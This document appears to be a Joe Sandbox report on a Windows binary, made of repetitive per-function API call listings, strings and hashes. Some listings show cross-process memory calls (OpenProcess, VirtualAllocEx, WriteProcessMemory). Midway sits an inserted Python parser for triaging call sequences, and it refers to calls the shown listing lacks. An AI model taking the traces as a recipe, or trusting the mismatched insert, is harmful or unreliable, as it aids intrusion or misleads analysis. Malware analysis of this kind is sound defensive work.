                                                                                  • ProgIDFromCLSID.OLE32(?,00000000), ref: 00529AF7
                                                                                  • lstrcmpiW.KERNEL32(?,00000000), ref: 00529B05
                                                                                  • CoTaskMemFree.OLE32(00000000,?,00000000), ref: 00529B15
                                                                                  • CLSIDFromString.OLE32(?,?), ref: 00529B21
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: From$Prog$FreeStringTasklstrcmpi
                                                                                  • String ID:
                                                                                  • API String ID: 3897988419-0
                                                                                  • Opcode ID: 3a50affbe5ddc129b6118123a2acd5e8b807082abde71c627e9ae77d3928440a
                                                                                  • Instruction ID: 2ca31a9d72ae9bcb030872b5854f18a0d65e3a8fff56116727c59de95d63a172
                                                                                  • Opcode Fuzzy Hash: 3a50affbe5ddc129b6118123a2acd5e8b807082abde71c627e9ae77d3928440a
                                                                                  • Instruction Fuzzy Hash: 84017C76A10224ABDB104F54FC44A9ABEBDEF59351F144028F909D2250D771DD44ABB0
                                                                                  APIs
                                                                                  • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 0052AA79
                                                                                  • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 0052AA83
                                                                                  • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 0052AA92
                                                                                  • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 0052AA99
                                                                                  • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 0052AAAF
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                  • String ID:
                                                                                  • API String ID: 44706859-0
                                                                                  • Opcode ID: 46400447d70a4de73ce2f22eb04152fd2c418cb92fe365f9805c218801710e0d
                                                                                  • Instruction ID: fc0310b343d8cd2aa96425783ea44abd42eead8a8ac7785088d9a160725cf9a5
                                                                                  • Opcode Fuzzy Hash: 46400447d70a4de73ce2f22eb04152fd2c418cb92fe365f9805c218801710e0d
                                                                                  • Instruction Fuzzy Hash: 3DF03C71200214AFEB115FA4FC89E673BBCFF5A754B100829F945D6190DB619C86EA71
                                                                                  APIs
                                                                                  • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 0052AADA
                                                                                  • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 0052AAE4
                                                                                  • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 0052AAF3
                                                                                  • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 0052AAFA
                                                                                  • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 0052AB10
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                  • String ID:
                                                                                  • API String ID: 44706859-0
                                                                                  • Opcode ID: dc2fbf2223426c42a571af8bcaa5f7273f8d95da2192a44e0d096ab1a37f3580
                                                                                  • Instruction ID: 9189d9bf3df6676aa69e61465d7fb9dc474e8fcdb649df14d20d533b4cc93b60
                                                                                  • Opcode Fuzzy Hash: dc2fbf2223426c42a571af8bcaa5f7273f8d95da2192a44e0d096ab1a37f3580
                                                                                  • Instruction Fuzzy Hash: 93F04F71200318AFEB110FA4FC88E673B7DFF46754F100429F945D7190DA619845EA71
                                                                                  APIs
                                                                                  • GetDlgItem.USER32(?,000003E9), ref: 0052EC94
                                                                                  • GetWindowTextW.USER32(00000000,?,00000100), ref: 0052ECAB
                                                                                  • MessageBeep.USER32(00000000), ref: 0052ECC3
                                                                                  • KillTimer.USER32(?,0000040A), ref: 0052ECDF
                                                                                  • EndDialog.USER32(?,00000001), ref: 0052ECF9
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                                                  • String ID:
                                                                                  • API String ID: 3741023627-0
                                                                                  • Opcode ID: 0ad04b1121eca24887b94bbd3c602115c2586b1c851e28de3f8f42ce5d45dd4e
                                                                                  • Instruction ID: dd1ee904b68d29f42daf04e808a3e6539f6f8e3feb91815943b346da37e88cdc
                                                                                  • Opcode Fuzzy Hash: 0ad04b1121eca24887b94bbd3c602115c2586b1c851e28de3f8f42ce5d45dd4e
                                                                                  • Instruction Fuzzy Hash: 04018170500714ABEB245B50FE5FB96BBB8FF11705F000559B686B14E0DBF4AE88EB50
                                                                                  APIs
                                                                                  • EndPath.GDI32(?), ref: 0050B0BA
                                                                                  • StrokeAndFillPath.GDI32(?,?,0056E680,00000000,?,?,?), ref: 0050B0D6
                                                                                  • SelectObject.GDI32(?,00000000), ref: 0050B0E9
                                                                                  • DeleteObject.GDI32 ref: 0050B0FC
                                                                                  • StrokePath.GDI32(?), ref: 0050B117
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: Path$ObjectStroke$DeleteFillSelect
                                                                                  • String ID:
                                                                                  • API String ID: 2625713937-0
                                                                                  • Opcode ID: 90fe206d47f8c39c373f04a4a8a85d74b9b78d441e260b36ea5f3c7604498570
                                                                                  • Instruction ID: 0169cb09ae02be4d572c7fa788c97b25e673ffc138746039f847cd7184c54342
                                                                                  • Opcode Fuzzy Hash: 90fe206d47f8c39c373f04a4a8a85d74b9b78d441e260b36ea5f3c7604498570
                                                                                  • Instruction Fuzzy Hash: B1F0F635000A08AFEBA19FA5EC1D7A83F74BB20362F488314E429444F0D7309999FF28
                                                                                  APIs
                                                                                  • CoInitialize.OLE32(00000000), ref: 0053F2DA
                                                                                  • CoCreateInstance.OLE32(0057DA7C,00000000,00000001,0057D8EC,?), ref: 0053F2F2
                                                                                  • CoUninitialize.OLE32 ref: 0053F555
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: CreateInitializeInstanceUninitialize
                                                                                  • String ID: .lnk
                                                                                  • API String ID: 948891078-24824748
                                                                                  • Opcode ID: 8d0be0e1d33c2af582adfc40b1f077122ad514da6614240656697a86144180ac
                                                                                  • Instruction ID: fa1968a0e89d7349d1dd371516f65945006ea4a733e8b6397ae3c6bcf90d6af9
                                                                                  • Opcode Fuzzy Hash: 8d0be0e1d33c2af582adfc40b1f077122ad514da6614240656697a86144180ac
                                                                                  • Instruction Fuzzy Hash: D2A11A71104205AFD300EF64C885EAFBBE8FF98718F00495DF65597192EB74EA49CBA2
                                                                                  APIs
                                                                                    • Part of subcall function 004F660F: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,004F53B1,?,?,004F61FF,?,00000000,00000001,00000000), ref: 004F662F
                                                                                  • CoInitialize.OLE32(00000000), ref: 0053E85D
                                                                                  • CoCreateInstance.OLE32(0057DA7C,00000000,00000001,0057D8EC,?), ref: 0053E876
                                                                                  • CoUninitialize.OLE32 ref: 0053E893
                                                                                    • Part of subcall function 004F936C: __swprintf.LIBCMT ref: 004F93AB
                                                                                    • Part of subcall function 004F936C: __itow.LIBCMT ref: 004F93DF
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
                                                                                  • String ID: .lnk
                                                                                  • API String ID: 2126378814-24824748
                                                                                  • Opcode ID: e41899405f5fa70afe430c84ea390ef5a68ac15a632d545d26e2b751ff3a09d9
                                                                                  • Instruction ID: 4d0340d96f83fb61436bb37a934bfdd05eb35531f63a81b6fe540a3ac86f88fe
                                                                                  • Opcode Fuzzy Hash: e41899405f5fa70afe430c84ea390ef5a68ac15a632d545d26e2b751ff3a09d9
                                                                                  • Instruction Fuzzy Hash: 34A133356043059FCB10DF15C885E6EBBE5BF88324F048999F99A9B3A1CB31EC45CB91
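Three of the call sequences listed above are recognisable idioms: QueryPerformanceCounter at 00537A74 and again at 00537A94 around a Sleep (elapsed-time measurement across a sleep), GetTokenInformation at 0052AADA with a zero-length buffer followed by GetLastError, HeapAlloc and a second GetTokenInformation at 0052AB10 (the standard size-probe-then-fill pattern, here for TokenIntegrityLevel), and CoInitialize/CoCreateInstance at 0053E85D/0053E876 in a function whose String ID is ".lnk". Picking such patterns out of a listing this long is easier mechanically. The parser below is an added example, not Joe Sandbox's code: it reads the "APIs" and "String ID" lines of this report format and flags ordered call subsequences. The rule set, the label strings and the `parse_blocks`/`triage` names are assumptions chosen for illustration; the sample input is an excerpt of the listing above, trimmed to the lines the parser reads.

```python
"""Parse the "APIs" blocks of a Joe Sandbox function listing and flag call
sequences worth a closer look. Added example: not Joe Sandbox code, and the
rule set below is an assumption for illustration."""
import re

# Constructed excerpt: three "APIs" blocks copied from the listing above,
# trimmed to the lines this parser reads.
SAMPLE_LISTING = """\
APIs
• QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00537A74
• QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00537A82
• Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00537A8A
• QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00537A94
• Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00537AD0
Similarity
• API ID: PerformanceQuery$CounterSleep$Frequency
• String ID:
APIs
• GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 0052AADA
• GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 0052AAE4
• GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 0052AAF3
• HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 0052AAFA
• GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 0052AB10
Similarity
• API ID: HeapInformationToken$AllocErrorLastProcess
• String ID:
APIs
  • Part of subcall function 004F660F: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,004F53B1,?,?,004F61FF,?,00000000,00000001,00000000), ref: 004F662F
• CoInitialize.OLE32(00000000), ref: 0053E85D
• CoCreateInstance.OLE32(0057DA7C,00000000,00000001,0057D8EC,?), ref: 0053E876
• CoUninitialize.OLE32 ref: 0053E893
Similarity
• API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
• String ID: .lnk
"""

# One API line: optional "Part of subcall function X:" prefix, Name.MODULE,
# optional "(args)" (may contain nested parens such as "00000003(TokenIntegrityLevel)"),
# then ", ref: ADDR". Entries without arguments read "CoUninitialize.OLE32 ref: ...".
API_LINE = re.compile(
    r"^•\s*(?:Part of subcall function [0-9A-Fa-f]+:\s*)?"
    r"(?P<api>\w+)\.(?P<module>\w+)"
    r"(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)$"
)
STRING_LINE = re.compile(r"^•\s*String ID:\s*(?P<s>.*)$")


def parse_blocks(text):
    """Return one dict per 'APIs' block: calls as (api, module, args, ref) tuples
    in listing order, plus any non-empty String ID seen before the next block."""
    blocks = []
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs":
            current = {"calls": [], "strings": []}
            blocks.append(current)
            continue
        if current is None:
            continue
        m = API_LINE.match(line)
        if m:
            current["calls"].append((m["api"], m["module"], m["args"] or "", m["ref"]))
            continue
        m = STRING_LINE.match(line)
        if m and m["s"]:
            current["strings"].append(m["s"])
    return blocks


# Ordered-subsequence rules (assumed for illustration); other calls may sit between the named ones.
RULES = {
    "timing check: QPC, Sleep, QPC": ("QueryPerformanceCounter", "Sleep", "QueryPerformanceCounter"),
    "token query with size probe": ("GetTokenInformation", "GetLastError", "HeapAlloc", "GetTokenInformation"),
    "COM object instantiation": ("CoInitialize", "CoCreateInstance"),
}


def is_subsequence(names, pattern):
    """True if every name in pattern occurs in names, in that order, with gaps allowed."""
    it = iter(names)
    return all(any(n == p for n in it) for p in pattern)


def triage(block):
    """Labels for one parsed block: matched rules, the TokenInformationClass
    argument of the first GetTokenInformation, and a .lnk note for COM blocks."""
    names = [c[0] for c in block["calls"]]
    hits = [label for label, pat in RULES.items() if is_subsequence(names, pat)]
    for api, _module, args, _ref in block["calls"]:
        if api == "GetTokenInformation":
            hits.append("token class: " + args.split(",")[1])  # second argument
            break
    if ".lnk" in block["strings"] and "COM object instantiation" in hits:
        hits.append("shell link (.lnk) handling")
    return hits


if __name__ == "__main__":
    for i, blk in enumerate(parse_blocks(SAMPLE_LISTING)):
        first_ref = blk["calls"][0][3] if blk["calls"] else "?"
        print(f"block {i} (first ref {first_ref}): {triage(blk)}")
```

The same parser works on the full function listing, since lines such as "• Source File: ..." or "• API ID: ..." never match the API-line pattern; add rules by appending ordered tuples to RULES. Note that a subsequence match is a lead for manual review of the function at the listed ref, not proof of intent.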
                                                                                  APIs
                                                                                  • __startOneArgErrorHandling.LIBCMT ref: 005132ED
                                                                                    • Part of subcall function 0051E0D0: __87except.LIBCMT ref: 0051E10B
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: ErrorHandling__87except__start
                                                                                  • String ID: pow
                                                                                  • API String ID: 2905807303-2276729525
                                                                                  • Opcode ID: 7520699cd9a203f4220197deb02f7c0fb6d660153d6dfa925e0dafa8075b59ba
                                                                                  • Instruction ID: f2a348f869786ff3fca84a0f86297c8f0a8f489a0f56dbb7e3ca436e848b9631
                                                                                  • Opcode Fuzzy Hash: 7520699cd9a203f4220197deb02f7c0fb6d660153d6dfa925e0dafa8075b59ba
                                                                                  • Instruction Fuzzy Hash: EB513735A0820296FB157714C9663FA6F94BB91710F208D68FCF5821A9DF748DC8EB46
                                                                                  APIs
                                                                                  • CharUpperBuffW.USER32(0000000C,00000016,00000016,00000000,00000000,?,00000000,0058DC50,?,0000000F,0000000C,00000016,0058DC50,?), ref: 00534645
                                                                                    • Part of subcall function 004F936C: __swprintf.LIBCMT ref: 004F93AB
                                                                                    • Part of subcall function 004F936C: __itow.LIBCMT ref: 004F93DF
                                                                                  • CharUpperBuffW.USER32(?,?,00000000,?), ref: 005346C5
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: BuffCharUpper$__itow__swprintf
                                                                                  • String ID: REMOVE$THIS
                                                                                  • API String ID: 3797816924-776492005
                                                                                  • Opcode ID: 89827fdab3f9e80ea1702a7d64f340bf9bd22172d69fd3e0f8e29c6a06a23259
                                                                                  • Instruction ID: db8c7d3fec376725daa58cdf22f4c39b0e57396842187e58f197805bb9fdec56
                                                                                  • Opcode Fuzzy Hash: 89827fdab3f9e80ea1702a7d64f340bf9bd22172d69fd3e0f8e29c6a06a23259
                                                                                  • Instruction Fuzzy Hash: 16417234A002599FCF00EF65C885ABDBBB5FF49304F148469E916AB292DB35ED46CF50
                                                                                  APIs
                                                                                    • Part of subcall function 0053430B: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,0052BC08,?,?,00000034,00000800,?,00000034), ref: 00534335
                                                                                  • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 0052C1D3
                                                                                    • Part of subcall function 005342D6: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,0052BC37,?,?,00000800,?,00001073,00000000,?,?), ref: 00534300
                                                                                    • Part of subcall function 0053422F: GetWindowThreadProcessId.USER32(?,?), ref: 0053425A
                                                                                    • Part of subcall function 0053422F: OpenProcess.KERNEL32(00000438,00000000,?,?,?,0052BBCC,00000034,?,?,00001004,00000000,00000000), ref: 0053426A
                                                                                    • Part of subcall function 0053422F: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,0052BBCC,00000034,?,?,00001004,00000000,00000000), ref: 00534280
                                                                                  • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0052C240
                                                                                  • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0052C28D
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                                                  • String ID: @
                                                                                  • API String ID: 4150878124-2766056989
                                                                                  • Opcode ID: dabc695a6d822d06ce494587788151eae308d8f90da13eabc204c17e85e30222
                                                                                  • Instruction ID: 6aede8078379dc0ba8a6d0b9f79177e38ed201795b4dc8a150f05b67df4f95b0
                                                                                  • Opcode Fuzzy Hash: dabc695a6d822d06ce494587788151eae308d8f90da13eabc204c17e85e30222
                                                                                  • Instruction Fuzzy Hash: 42415C76900219AFDB10EFA4DC85AEEBB78BF49300F004095FA55B7181DA716E85DF61
                                                                                  APIs
                                                                                  • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,0058DC00,00000000,?,?,?,?), ref: 0055A6D8
                                                                                  • GetWindowLongW.USER32 ref: 0055A6F5
                                                                                  • SetWindowLongW.USER32(?,000000F0,00000000), ref: 0055A705
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: Window$Long
                                                                                  • String ID: SysTreeView32
                                                                                  • API String ID: 847901565-1698111956
                                                                                  • Opcode ID: 3032556ecc041722dbbae2d4456f8441772c263ed34814c4dc82c1e806ad4c26
                                                                                  • Instruction ID: 5af0d32ee48fc9dbc7fb00ab644f20f3eace6036940adb82b6b90f50329579ba
                                                                                  • Opcode Fuzzy Hash: 3032556ecc041722dbbae2d4456f8441772c263ed34814c4dc82c1e806ad4c26
                                                                                  • Instruction Fuzzy Hash: 6331AD31600206ABDB118E38DC55BEA7BA9FF89364F244716F875931E0C770AC589BA0
                                                                                  APIs
                                                                                  • _memset.LIBCMT ref: 00545190
                                                                                  • InternetCrackUrlW.WININET(?,00000000,00000000,?), ref: 005451C6
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: CrackInternet_memset
                                                                                  • String ID: |$DT
                                                                                  • API String ID: 1413715105-4036583020
                                                                                  • Opcode ID: 0c806dfa1207d4703efebda967a520a69e9b7e6abd106df181ce79e833abd552
                                                                                  • Instruction ID: 07604bc4c3df803ba8aa7472ee179187bd2a9395bbaba249227ae9f9d7be55f9
                                                                                  • Opcode Fuzzy Hash: 0c806dfa1207d4703efebda967a520a69e9b7e6abd106df181ce79e833abd552
                                                                                  • Instruction Fuzzy Hash: BF316A71C0010DABCF01EFA1CC85AEEBFB8FF14704F00005AF904A6166EB75AA46CBA0
                                                                                  APIs
                                                                                  • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 0055A15E
                                                                                  • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 0055A172
                                                                                  • SendMessageW.USER32(?,00001002,00000000,?), ref: 0055A196
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: MessageSend$Window
                                                                                  • String ID: SysMonthCal32
                                                                                  • API String ID: 2326795674-1439706946
                                                                                  • Opcode ID: 4d2840879cdc8413558f3264e278c67dcfe3050d57d02a14cb0fa332f8104839
